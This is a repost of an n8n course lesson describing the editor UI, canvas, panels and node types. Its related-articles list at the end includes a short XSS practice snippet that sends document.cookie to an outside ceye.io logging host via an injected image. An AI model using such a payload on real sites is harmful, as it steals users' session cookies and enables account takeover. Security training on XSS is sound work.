【n8n教程筆記——工作流Workflow】文本課程(第一階段)——1、導航編輯器界面(Navigating the editor UI)介紹

https://docs.n8n.io/courses/

文章目錄

  • Navigating the Editor UI
    • Getting started
    • Editor UI settings
      • Left-side panel
      • Top bar
      • Canvas
    • Nodes
      • Finding nodes
      • Adding nodes
      • Node buttons
    • Summary

Navigating the Editor UI

In this lesson you will learn how to navigate the Editor UI. We will walk through the canvas and show you what each icon means and where to find things you will need while building workflows in n8n.

editor (n8n)
The n8n editor UI allows you to create and manage workflows. The main area is the canvas, where you can compose workflows by adding, configuring, and connecting nodes. The side and top panels allow you to access other areas of the UI like credentials, templates, variables, executions, and more.

canvas (n8n):
The canvas is the main interface for building workflows in n8n’s editor UI. You use the canvas to add and connect nodes to compose workflows.

n8n version
course is based on n8n version 1.82.1. In other versions, some user interfaces might look different, but this shouldn’t impact the core functionality.

Getting started

Begin by setting up n8n.

We recommend starting with n8n Cloud, a hosted solution that doesn’t require installation and includes a free trial.

Alternative set up
If n8n Cloud isn’t a good option for you, you can self-host with Docker. This is an advanced option recommended only for technical users familiar with hosting services, Docker, and the command line.

For more details on the different ways to set up n8n, see our platforms documentation.

Once you have n8n running, open the Editor UI in a browser window. Log in to your n8n instance. Select Overview and then Create Workflow to view the main canvas.

It should look like this:

在這里插入圖片描述

Editor UI settings

The editor UI is the web interface where you build workflows. You can access all your workflows and credentials, as well as support pages, from the Editor UI.

credential (n8n):
In n8n, credentials store authentication information to connect with specific apps and services. After creating credentials with your authentication information (username and password, API key, OAuth secrets, etc.), you can use the associated app node to interact with the service.

Left-side panel

On the left side of the Editor UI, there is a panel which contains the core functionalities and settings for managing your workflows. Expand and collapse it by selecting the small arrow icon.

在這里插入圖片描述

The panel contains the following sections:

  • Overview: Contains all the workflows and credentials you have access to. During this course, create new workflows here.
    在這里插入圖片描述

  • Projects: (Not available on Community edition) Projects group workflows and credentials. You can assign roles to users in a project to control what they can do in a project. A Personal project is available by default.

    RBAC(Role-Based Access Control) role types:
    Within projects, there are three user roles: Admin, Editor, and Viewer. These roles control what the user can do in a project. A user can have different roles within different projects.
    在這里插入圖片描述

  • Admin Panel: n8n Cloud only. Access your n8n instance usage, billing, and version settings.
    在這里插入圖片描述

  • Templates: A collection of pre-made workflows. Great place to get started with common use cases.
    在這里插入圖片描述

  • Variables: Used to store and access fixed data across your workflows. This feature is available on the Pro and Enterprise Plans.
    在這里插入圖片描述

  • All executions(Insights): Contains information about your workflow executions.
    在這里插入圖片描述

  • Help: Contains resources around n8n product and community.
    在這里插入圖片描述

  • Update(What’s New): (When updates are available) Indicator for any recent product updates.
    在這里插入圖片描述

  • Settings: Under the ellipsis (...) menu by your username. Manage users and access settings for a variety of features.
    在這里插入圖片描述

在這里插入圖片描述

Top bar

The top bar of the Editor UI contains the following information:
在這里插入圖片描述

  • Workflow Name: By default, n8n names a new workflow as “My workflow”, but you can edit the name at any time.
    在這里插入圖片描述

  • + Add Tag: Tags help you organise your workflows by category, use case, or whatever is relevant for you. Tags are optional.
    在這里插入圖片描述
    在這里插入圖片描述

  • Inactive/active toggle: This button activates or deactivates the current workflow. By default, workflows are deactivated.
    在這里插入圖片描述

  • Share: You can share and collaborate with others on workflows on the Starter, Pro, and Enterprise plans.
    在這里插入圖片描述
    在這里插入圖片描述

  • Save: This button saves the current workflow.
    在這里插入圖片描述

  • History: Once you save your workflow, you can view previous versions here.
    在這里插入圖片描述
    在這里插入圖片描述

Canvas

The canvas is the gray dotted grid background in the Editor UI. It displays several icons and a node with different functionalities:
在這里插入圖片描述

  • Buttons to zoom the canvas to fit the screen, zoom in or out of the canvas, and tidy up the nodes on screen.
    在這里插入圖片描述

  • A button to Execute workflow once you add your first node. When you click on it, n8n executes all nodes on the canvas in sequence.
    在這里插入圖片描述

  • A button with a + sign inside. This button opens the nodes panel.
    在這里插入圖片描述

  • A button with a note icon inside. This button adds a sticky note to the canvas (visible when hovering on the top right + icon).
    在這里插入圖片描述
    在這里插入圖片描述
    在這里插入圖片描述

    Sticky Notes
    Sticky Notes allow you to annotate and comment on your workflows.

    n8n recommends using Sticky Notes heavily, especially on template workflows, to help other users understand your workflow.

  • A dotted square with the text “Add first step.” This is where you add your first node.

在這里插入圖片描述

Moving the canvas:
You can move the workflow canvas around in three ways:

  • Select ctrl + left-button on the canvas and move it around.
  • Select middle-button on the canvas and move it around.
  • Place two fingers on your touchpad and slide.

Don’t worry about workflow execution and activation for now; we’ll explain these concepts later on in the course.

Nodes

You can think of nodes as building blocks that serve different functions that, when put together, make up a functioning machine: an automated workflow.

Node:
A node is an individual step in your workflow: one that either (a) loads, (b) processes, or (c) sends data.

Based on their function, n8n classifies nodes into four types:

  • App or Action Nodes add, remove, and edit data; request and send external data; and trigger events in other systems. Refer to the Action nodes library for a full list of these nodes.
  • Trigger Nodes start a workflow and supply the initial data. Refer to the Trigger nodes library for a list of trigger nodes.
  • Core Nodes can be trigger or app nodes. Whereas most nodes connect to a specific external service, core nodes provide functionality such as logic, scheduling, or generic API calls. Refer to the Core Nodes library for a full list of core nodes.
  • Cluster Nodes are node groups that work together to provide functionality in a workflow, primarily for AI workflows. Instead of using a single node, you use a root node and one or more sub-nodes that extend the functionality of the node. Refer to Cluster nodes for more information.
    在這里插入圖片描述

Learn more:
Refer to Node types for a more detailed explanation of all node types.

Finding nodes

You can find all available nodes in the nodes panel on the right side of the Editor UI. There are three ways in which you can open the nodes panel:

  • Click the + icon in the top right corner of the canvas.
    在這里插入圖片描述

  • Click the + icon on the right side of an existing node on the canvas (the node to which you want to add another one).
    在這里插入圖片描述

  • Click the tab key on your keyboard.

在這里插入圖片描述

In the nodes panel, notice that when adding your first node, you will see the different trigger node categories. After you have added your trigger node, you’ll see that the nodes panel changes to show Advanced AI, Actions in an App, Data transformation, Flow, Core, and Human in the loop nodes.

If you want to find a specific node, use the search input at the top of the nodes panel.

Adding nodes

There are two ways to add nodes to your canvas:

  • Select the node you want in the nodes panel. The new node will automatically connect to the selected node on the canvas.
  • Drag and drop the node from the nodes panel to the canvas.

Node buttons

If you hover on a node, you’ll notice that three icons appear on top:
在這里插入圖片描述

  • Execute the node (Play icon)
  • Deactivate/Activate the node (Power icon)
  • Delete the node (Trash icon)

There will also be an ellipsis icon, which opens a context menu containing other node options.
在這里插入圖片描述

Moving a workflow:
To move a workflow around the canvas, select all nodes with your mouse or ctrl+a, select and hold on a node, then drag it to any point you want on the canvas.

Summary

In this lesson you learned how to navigate the Editor UI, what the icons mean, how to access the left-side and node panels, and how to add nodes to the canvas.

In the next lesson, you will build a mini-workflow to put into practice what you’ve learned so far.

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/90170.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/90170.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/90170.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

【Altium Designer2025】電子設計自動化(EDA)軟件——Altium Designer25版保姆級下載安裝詳細圖文教程(附安裝包)

今天給大家帶來精心編寫的Altium Designer2025版下載安裝全流程圖文指南,涵蓋從系統準備到安裝使用的完整過程。 教程嚴格遵循零廣告、純工具向原則,手把手教你如何正確安裝并配置好這款強大的軟件,讓你快速進入電路設計的世界! …

智象科技賦能金融、證券行業 IT 運維

一、金融、證券行業 IT 運維現狀剖析 金融、證券行業 IT 系統架構極其復雜,業務對時效性和連續性的要求近乎苛刻,同時安全監管嚴格,這些特點共同催生了諸多運維痛點。 系統架構復雜 :IT 系統包含多個業務系統、數據平臺和網絡架構…

微信小程序服務端快速對接指南(java版)

背景說明 本文檔旨在描述服務端在開發微信小程序時需要對接的小程序接口,以簡要的方式描述對接流程、接口文檔、使用場景。有些接口需要前后端配合,本文主要描述后端接口,對于前端僅輕輕點過。開發語言為Java,但是對接的思路跟語言沒有關系,應該不盡相同; 小程序上手路線…

微信小程序入門實例_____從零開始 開發一個“旅行清單 ”微信小程序

前面的博文中。我們陸續學習與開發了記賬等一些實用實用小程序的開發過程,今天來打造一個適合出行場景的工具 ——“旅行清單小程序”。無論是短途游玩還是長途旅行,它都能幫你梳理需要攜帶的物品,避免遺漏。下面就跟著步驟,一步步…

MySQL主從同步集群(Docker搭建)

以下筆記都是基于黑馬程序員的面試題寫的: Mysql定位慢查詢-CSDN博客 Mysql索引-CSDN博客 MySQL事物相關-CSDN博客 MySQL主從同步集群(Docker搭建)-CSDN博客 MySQL相關面試問題總結-CSDN博客 主從同步(Master-Slave Replicat…

NISP-PTE基礎實操——XSS

pteXSS模擬1 <script> var img document.createElement("img");img.src"http://xxxxx.ceye.io/log?"escape(document.coo kie);document.body.appendChild(img); </script> 重放加Cookie頭 pteXSS模擬2 <script type"text/javasc…

基于網絡爬蟲的在線醫療咨詢數據爬取與醫療服務分析系統,技術采用django+樸素貝葉斯算法+boostrap+echart可視化

摘要 為了發揮互聯網醫療問詢服務平臺在客觀衡量醫療服務質量、進一步分析和挖掘網民評論數據方面的作用&#xff0c;本文完成了互聯網醫療問詢數據抓取與醫療服務質量服務分析平臺的主要模塊應用&#xff0c;如用戶登錄注冊、醫療服務質量數據分析與信息可視化以及用戶情緒識別…

【備忘錄】Ubuntu 配置 NFS

安裝 NFSsudo apt-get install nfs-kernel-server rpcbind啟動 NFSsudo systemctl start nfs-server查看 NFSsudo service nfs-server status

【coze扣子】第1篇:coze快速入門

文章目錄coze扣子Coze優點Coze智能體快速入門1、登錄進入到個人主頁2、創建智能體3、智能體組成部分4、智能體的發布人設與回復邏輯LLM模型配置模型設置生成多樣性(抽象程度)Top P&#xff08;話癆程度&#xff09;重復語句懲罰攜帶上下文輪數最大回復長度技能插件觸發器定時觸…

PyCharm 入門指南:起步學習、開發環境一體

PyCharm 入門指南一、前置準備&#xff1a;為什么選擇 PyCharm&#xff1f; 對于 Python 初學者&#xff0c;PyCharm 是最友好的集成開發環境&#xff08;IDE&#xff09;之一。它通過智能代碼提示、自動糾錯、調試工具、版本控制集成等功能&#xff0c;大幅降低開發門檻。本文…

【Java企業級開發】(六)Java框架技術-Maven和MyBatis

一、Maven 1.1 非Maven項目的缺點 問題一&#xff1a; 項目中的jar包資源需要我們自己從網上下載后&#xff0c;手動導入到項目中使用&#xff0c;不好管理 問題二&#xff1a; jar包版本控制麻煩 1.2 Maven介紹 Maven是使用Java語言編寫的基于項目對象模型&#xff08;POM&am…

學習秒殺系統-頁面優化技術

文章目錄前言頁面緩存URL緩存對象緩存頁面緩存取緩存手動渲染URL緩存對象緩存頁面靜態化&#xff0c;前后端分離&#xff08;常用&#xff09;GET POST區別如何解決超賣&#xff1f;重復賣&#xff1f;&#xff08;簡單版&#xff09;靜態資源優化多個JS/CSS組合&#xff0c;減…

QCC系列顯示交互層的自研技術突破與實踐

在音頻設備智能化進程中&#xff0c;顯示交互的流暢度與兼容性已成為用戶體驗的核心指標。傳統方案中&#xff0c;TFT 彩屏與多語言適配常面臨硬件驅動沖突、功耗失控、字符顯示錯亂等問題。作為高通平臺十年級方案商&#xff0c;騰泰技術在 QCC 系列中聚焦顯示交互層的自研技術…

JMeter 實現 Protobuf 加密解密

一、 .proto文件編譯成.jar文件 相關依賴下載詳見&#xff1a;將 message.proto 編譯成 .jar文件 1.依賴于java編譯環境 2.依賴protoc編譯jar包 編譯目錄 1.創建一個根目錄&#xff1a;protobuf 2.在protobuf下創建build、output、lib、src目錄 lib&#xff1a;放 protobu…

發票識別在費控系統應用剖析

一、發票識別與費控系統的融合價值1.1 解決傳統費控痛點效率瓶頸突破&#xff1a;將人工處理每張發票的5-8分鐘縮短至秒級自動識別準確性飛躍&#xff1a;關鍵字段識別準確率從人工的95%提升至99%以上合規性強化&#xff1a;自動對接稅務系統驗真&#xff0c;虛假發票識別率提升…

Rust實戰:決策樹與隨機森林實現

基于 Rust 實現決策樹(Decision Tree)和隨機森林(Random Forest)的實例 Linfa的基本定義 Linfa是意大利語中“淋巴”(lymph)的意思,在醫學領域指淋巴系統相關的結構或功能。淋巴系統由淋巴管、淋巴結、脾臟等組成,負責免疫防御和體液平衡。 Linfa在生物學中的作用 …

9. isaacsim4.2教程-ROS加相機/CLOCK

在本示例中&#xff0c;我們將學習如何&#xff1a; 向場景中添加額外的相機并將其安裝在機器人上 添加相機發布器&#xff08;Camera Publishers&#xff09; 通過 rostopics 發送真實的合成感知數據&#xff08;ground truth synthetic perception data&#xff09; 前提…

微信小程序171~180

1.封裝購物車接口API import http from /utils/httpexport const reqAddCrt ({ goodsId, count, ...data }) > {return http.get(/cart/addToCart/${goodsId}/${count}, data) }export const reqCartList () > {return http.get(/cart/getCartList) }export const reqU…

修改 docker 容器的掛載配置(保持數據不丟的情況)

一、核心原理Docker 容器的運行時配置&#xff08;包括掛載&#xff09;是啟動時確定的&#xff0c;一旦啟動無法直接修改。因此&#xff0c;需通過以下步驟實現&#xff1a;保存原容器中的數據&#xff08;避免丟失&#xff09;&#xff1b;基于原鏡像創建新容器&#xff0c;同…

MVCC(多版本并發控制)介紹及實現原理

一、什么是MVCC&#xff1f; MVCC&#xff08;Multi-Version Concurrency Control&#xff0c;多版本并發控制&#xff09;是數據庫中用于解決并發訪問問題的一種機制。它通過為數據維護多個版本&#xff0c;讓讀寫操作在不同版本上獨立進行&#xff0c;從而避免了傳統鎖機制中…